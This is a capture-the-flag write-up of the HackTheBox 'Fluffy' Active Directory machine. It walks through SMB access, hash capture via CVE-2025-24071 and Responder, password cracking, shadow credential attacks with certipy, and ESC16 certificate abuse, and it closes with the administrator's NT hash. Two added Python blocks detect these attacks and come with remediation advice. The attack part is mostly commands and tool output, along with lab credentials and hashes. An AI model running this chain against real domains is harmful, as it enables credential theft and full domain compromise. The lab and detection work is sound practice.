HTB-Fluffy


Information gathering

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# rustscan -a 10.10.11.69 -- -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
____ ____ ____ ____ ____ ____ ____ ____ ____ ____
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.11.69:53
Open 10.10.11.69:88
Open 10.10.11.69:139
Open 10.10.11.69:389
Open 10.10.11.69:445
Open 10.10.11.69:464
Open 10.10.11.69:593
Open 10.10.11.69:636
Open 10.10.11.69:3268
Open 10.10.11.69:3269
Open 10.10.11.69:5985
Open 10.10.11.69:9389
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV" on ip 10.10.11.69
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 11:37 EDT
NSE: Loaded 47 scripts for scanning.
Initiating Ping Scan at 11:37
Scanning 10.10.11.69 [4 ports]
Completed Ping Scan at 11:38, 2.83s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:38
Completed Parallel DNS resolution of 1 host. at 11:38, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:38
Scanning 10.10.11.69 [12 ports]
Discovered open port 53/tcp on 10.10.11.69
Discovered open port 5985/tcp on 10.10.11.69
Discovered open port 445/tcp on 10.10.11.69
Discovered open port 139/tcp on 10.10.11.69
Discovered open port 9389/tcp on 10.10.11.69
Discovered open port 389/tcp on 10.10.11.69
Discovered open port 464/tcp on 10.10.11.69
Discovered open port 636/tcp on 10.10.11.69
Discovered open port 88/tcp on 10.10.11.69
Discovered open port 3269/tcp on 10.10.11.69
Discovered open port 3268/tcp on 10.10.11.69
Discovered open port 593/tcp on 10.10.11.69
Completed SYN Stealth Scan at 11:38, 0.36s elapsed (12 total ports)
Initiating Service scan at 11:38
Scanning 12 services on 10.10.11.69
Completed Service scan at 11:38, 48.89s elapsed (12 services on 1 host)
NSE: Script scanning 10.10.11.69.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:38
Completed NSE at 11:38, 0.87s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:38
Completed NSE at 11:38, 1.09s elapsed
Nmap scan report for 10.10.11.69
Host is up, received echo-reply ttl 127 (0.74s latency).
Scanned at 2025-06-04 11:38:01 EDT for 51s

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-04 22:16:38Z)
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.35 seconds
Raw packets sent: 20 (832B) | Rcvd: 19 (868B)
```

SMB

Credentials are provided:

```
j.fleischman / J0elTHEM4n1990!
```

Try them against the SMB service; run smbmap with them:

```
[+] IP: 10.10.11.69:445 Name: bogon                     Status: Authenticated
Disk       Permissions  Comment
----       -----------  -------
ADMIN$     NO ACCESS    Remote Admin
C$         NO ACCESS    Default share
IPC$       READ ONLY    Remote IPC
IT         READ, WRITE
NETLOGON   READ ONLY    Logon server share
SYSVOL     READ ONLY    Logon server share
```

The IT share is readable and writable, so connect to it:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# smbclient //10.10.11.69/IT -U 'j.fleischman'
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  4 18:20:46 2025
  ..                                  D        0  Wed Jun  4 18:20:46 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

                5842943 blocks of size 4096. 1362088 blocks available
```

There is a PDF file; download it.

CVE-2025-24071

The PDF lists several CVE numbers. Looking them up turns up CVE-2025-24071; combined with the fact that every zip in the IT share has already been extracted, the guess is that uploaded archives get unpacked automatically. Generate the malicious file first, then start the listener:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# responder -I tun0 -wvF
```

Then upload the malicious file, wait a moment, and the hash arrives:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# responder -I tun0 -wvF
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -_ _|_ _ --| _ | _ | | _ || -__| _|
|__| |__ ___|___ __| __|____ _|_ _|_ _|_ ____||____ _|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.5.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [ON]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.86]
Responder IPv6 [dead:beef:4::1054]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-YEKAC9P279V]
Responder Domain Name [S41C.LOCAL]
Responder DCE-RPC Port [48375]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:15a7f5671d8f23b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
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:856c2146dfc1f95c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
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:b02f2a9cafa7b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
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:7545fe61b09b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
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:30fe9a80b4fa471a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
[SMB] NTLMv2-SSP Client : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:fede96ac801d08d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
```

This NTLMv2 hash can be cracked with john:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# john pass --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:02 DONE (2025-06-04 12:02) 0.3412g/s 1541Kp/s 1541Kc/s 1541KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```

Then use this domain account for some enumeration inside the domain:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# crackmapexec smb 10.10.11.69 -u 'p.agila' -p 'prometheusx-303'
SMB 10.10.11.69 445 DC01 [*] Windows 10.0 Build 17763 (name: DC01) (domain: fluffy.htb) (signing: True) (SMBv1: False)
SMB 10.10.11.69 445 DC01 [+] fluffy.htb\p.agila:prometheusx-303
```

Domain enumeration

Collect domain data with BloodHound; the domain controller's hostname is DC01.fluffy.htb.

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -ns 10.10.11.69 -c All --zip
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 35S
INFO: Compressing output into 20250604122752_bloodhound.zip
```

Follow the red edge in the BloodHound graph:

GenericAll: full control over the target user/group.
GenericWrite: the right to update the target object's attribute values.

Shadow credential attack

p.agila is a member of the Service Managers group. This user can add themselves to the Service Accounts group, which grants GenericWrite over the svc users; combined with the CA certificate service, that permission enables a shadow credential attack.

Prerequisites for the shadow credential attack

1. At least one Windows Server 2016 domain controller.
2. Domain functional level of Windows Server 2016 or higher (the DC here is Windows Server 2019 Standard).
3. AD CS or a CA is enabled.

As long as we can modify an account's msDS-KeyCredentialLink attribute and the three conditions above hold, we can obtain that account's TGT and NTLM hash. We hold GenericWrite over the svc accounts.

First add the user to the Service Accounts group:
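From the defender's side, the write to msDS-KeyCredentialLink described above is the one observable step: with auditing of Directory Service Changes enabled on the DC, each modification of that attribute is logged as Security event 5136. The following is an added example (not part of this writeup or of any tool it uses) that runs two checks over a constructed set of 5136 records: writes to msDS-KeyCredentialLink by a principal other than the account itself, and an "add then delete" pair on the same account within a short window, which is the footprint the certipy shadow auto run above leaves behind (it adds a key credential, authenticates, then restores the old value). The event field names (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType) are the real 5136 fields; the sample events and the account names in them are constructed for the example.

```python
"""Flag suspicious msDS-KeyCredentialLink writes in Windows Security event 5136 records."""
from datetime import datetime

VALUE_ADDED = "%%14674"    # 5136 OperationType code: value added
VALUE_DELETED = "%%14675"  # 5136 OperationType code: value deleted
KEYCRED_ATTR = "msds-keycredentiallink"

# Constructed sample of 5136 events, reduced to the fields the checks need.
SAMPLE_EVENTS = [
    {"TimeCreated": "2025-06-04T12:40:01", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2025-06-04T12:40:03", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_DELETED},
    # A user enrolling their own key (e.g. Windows Hello) writes their own attribute: benign.
    {"TimeCreated": "2025-06-04T09:00:00", "SubjectUserName": "alice",
     "ObjectDN": "CN=alice,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # An unrelated attribute change by the same writer: not in scope.
    {"TimeCreated": "2025-06-04T09:05:00", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]


def account_name(dn):
    """Leading RDN value of a DN ('winrm_svc' for 'CN=winrm_svc,...'), lower-cased.
    This approximates the sAMAccountName; in most domains the CN and logon name match."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1].strip().lower()


def keycred_events(events):
    """Only the events that touch msDS-KeyCredentialLink."""
    return [e for e in events if e["AttributeLDAPDisplayName"].lower() == KEYCRED_ATTR]


def foreign_keycred_writes(events):
    """Writes to msDS-KeyCredentialLink where the writer is not the target account itself."""
    hits = []
    for e in keycred_events(events):
        writer = e["SubjectUserName"].lower()
        target = account_name(e["ObjectDN"])
        if writer != target:
            hits.append({"time": e["TimeCreated"], "writer": writer,
                         "target": target, "op": e["OperationType"]})
    return hits


def add_then_delete(events, window_seconds=300):
    """Value-added followed by value-deleted on the same object by the same writer
    within the window: the shape a 'shadow auto' style add/authenticate/restore leaves."""
    pairs = []
    pending_adds = {}
    for e in sorted(keycred_events(events), key=lambda ev: ev["TimeCreated"]):
        key = (e["SubjectUserName"].lower(), e["ObjectDN"].lower())
        when = datetime.fromisoformat(e["TimeCreated"])
        if e["OperationType"] == VALUE_ADDED:
            pending_adds[key] = when
        elif e["OperationType"] == VALUE_DELETED and key in pending_adds:
            delta = (when - pending_adds.pop(key)).total_seconds()
            if 0 <= delta <= window_seconds:
                pairs.append({"writer": key[0], "target": account_name(e["ObjectDN"]),
                              "seconds": delta})
    return pairs


if __name__ == "__main__":
    for hit in foreign_keycred_writes(SAMPLE_EVENTS):
        print("foreign KeyCredentialLink write:", hit)
    for pair in add_then_delete(SAMPLE_EVENTS):
        print("add-then-restore pattern:", pair)
```

In a real deployment the records come from the DC's Security log (event 5136 requires the "Audit Directory Service Changes" subcategory and a SACL on the user objects), and the allow-list for the first check would also cover the provisioning identities that legitimately write keys on behalf of users.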

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodyAD -d fluffy.htb -u p.agila -p 'prometheusx-303' --dc-ip 10.10.11.69 get writable
```

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '176ea786-94c4-9724-c344-5ea70d5c8689'
[*] Adding Key Credential with device ID '176ea786-94c4-9724-c344-5ea70d5c8689' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '176ea786-94c4-9724-c344-5ea70d5c8689' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767
```

We have the hash (if it cannot be obtained, check the clock skew / time zone against the DC).

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# evil-winrm -i 10.10.11.69 -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
```

In the same way, the shadow credential technique yields the hash of CA_SVC:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'CA_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '016d8ca3-d941-fd7b-bd40-2960883be18a'
[*] Adding Key Credential with device ID '016d8ca3-d941-fd7b-bd40-2960883be18a' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '016d8ca3-d941-fd7b-bd40-2960883be18a' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
```

ESC16

Check whether the CA or its certificate templates have a known weakness:

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# certipy-ad find -username ca_svc -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via CSRA

[!] Got error while trying to get CA configuration for 'fluffy-DC01-CA' via CSRA: Could not connect: timed out
[*] Trying to get CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'fluffy-DC01-CA'
[*] Saved BloodHound data to '20250604125906_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250604125906_Certipy.txt'
[*] Saved JSON output to '20250604125906_Certipy.json'
```

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 20250604125906_Certipy.txt
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
Certificate Templates                   : [!] Could not find any certificate templates
```

This version of Certipy reports nothing, so update it first:

```
pip install -U certipy-ad
```

```
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat 20250604131307_Certipy.txt
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates
```

ESC16 is present: the CA has the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2) on its disabled-extensions list, so certificates it issues carry no SID binding.
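The two Certipy text dumps above show what actually distinguishes ESC16: the "Disabled Extensions" line listing OID 1.3.6.1.4.1.311.25.2, which the older Certipy 4.8.2 did not print at all. The following is an added example (not part of this writeup and not Certipy's own code) that parses the flattened "Key : Value" layout of the Certipy text report into a dictionary and classifies a CA as "vulnerable", "ok", or "unknown" (field absent, as in the 4.8.2 output, which must not be read as safe). The two report excerpts embedded in the block are cut down from the outputs shown on this page; the third case, a CA with a different disabled OID, is constructed.

```python
"""Classify a CA for ESC16 from Certipy 'find' text output."""
import re

# szOID_NTDS_CA_SECURITY_EXT: the SID extension that strong certificate mapping relies on.
SECURITY_EXT_OID = "1.3.6.1.4.1.311.25.2"

# Excerpt of the newer Certipy report from this page (indentation removed).
REPORT_NEW = """\
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\\Administrators
"""

# Excerpt of the Certipy 4.8.2 report from this page: no 'Disabled Extensions' field.
REPORT_OLD = """\
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Owner : FLUFFY.HTB\\Administrators
"""

# Constructed: a CA whose disabled list does not include the security extension.
REPORT_OTHER_OID = REPORT_NEW.replace(
    "Disabled Extensions : 1.3.6.1.4.1.311.25.2",
    "Disabled Extensions : 1.3.6.1.4.1.311.21.7, 2.5.29.19")

# 'Key : Value' where the key is words only; the lazy key stops at the first colon,
# so values that themselves contain colons (timestamps) survive intact.
LINE_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?)\s*:\s*(.+?)\s*$")


def parse_ca_fields(text):
    """Collect 'Key : Value' lines into a dict of lists (keys may repeat, e.g. 'Enabled')."""
    fields = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            fields.setdefault(m.group(1), []).append(m.group(2))
    return fields


def disabled_extensions(fields):
    """OIDs listed under 'Disabled Extensions', split on commas, whitespace-trimmed."""
    return [oid.strip()
            for value in fields.get("Disabled Extensions", [])
            for oid in value.split(",")]


def esc16_status(text):
    """'vulnerable' if the SID extension is disabled, 'ok' if the list is present without
    it, 'unknown' if the report carries no such field (older Certipy, partial output)."""
    fields = parse_ca_fields(text)
    if "Disabled Extensions" not in fields:
        return "unknown"
    return "vulnerable" if SECURITY_EXT_OID in disabled_extensions(fields) else "ok"


if __name__ == "__main__":
    for name, report in (("new", REPORT_NEW), ("old", REPORT_OLD), ("other", REPORT_OTHER_OID)):
        ca = parse_ca_fields(report).get("CA Name", ["?"])[0]
        print(f"{name}: {ca} -> {esc16_status(report)}")
```

The remediation the classification points at is on the CA itself: remove the OID from the CA's DisableExtensionList (`certutil -setreg policy\DisableExtensionList -1.3.6.1.4.1.311.25.2`, then restart the CertSvc service) so that newly issued certificates carry the SID extension again, and keep the domain controllers on full enforcement of strong certificate mapping (StrongCertificateBindingEnforcement = 2 from KB5014754), which is what makes the missing extension matter in the first place.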

```
# ESC16 attack
certipy-ad account -u 'ca_svc' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -upn 'administrator' -user 'ca_svc' update

certipy-ad account -u 'ca_svc' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.249.10 -user 'ca_svc' read

certipy-ad req -dc-ip '10.129.249.10' -u 'administrator' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

certipy-ad account -u 'ca_svc' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'dc01.fluffy.htb' -upn 'winrm_svc' -user 'ca_svc' update

certipy-ad auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.249.10
```

```
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```